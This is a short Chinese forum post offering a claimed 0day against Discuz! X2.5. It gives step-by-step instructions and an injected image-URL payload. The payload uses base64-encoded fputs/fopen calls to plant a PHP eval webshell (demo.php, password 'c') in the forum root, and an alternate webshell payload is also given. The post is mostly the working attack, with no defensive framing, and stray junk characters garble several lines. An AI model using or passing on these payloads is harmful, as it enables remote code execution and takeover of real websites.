DZ X2.5最新0day
1 [7 \: B; O; F1.注册任意账户; h A7 l1 [/ `; B2 E
2.登陆用户,发表blog日志(注意是日志) //点击一下中间注册的用户名 就看到了- h. ?/ C" Z5 x3 x1 P1 y# [
3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}} //所使用代码
5 y5 b. J+ P, h. w# I- I<?php @eval($_POST[c]); ?>ok
% P% r4 v2 A; o2 Q* d3 f n7 z<?fputs(fopen("dome","w"),"<?eval(\$_POST[c]);?>")?>
) o% k6 L% q' H% F2 P9 V4.访问日志,论坛根目录下生成demo.php,一句发密码C |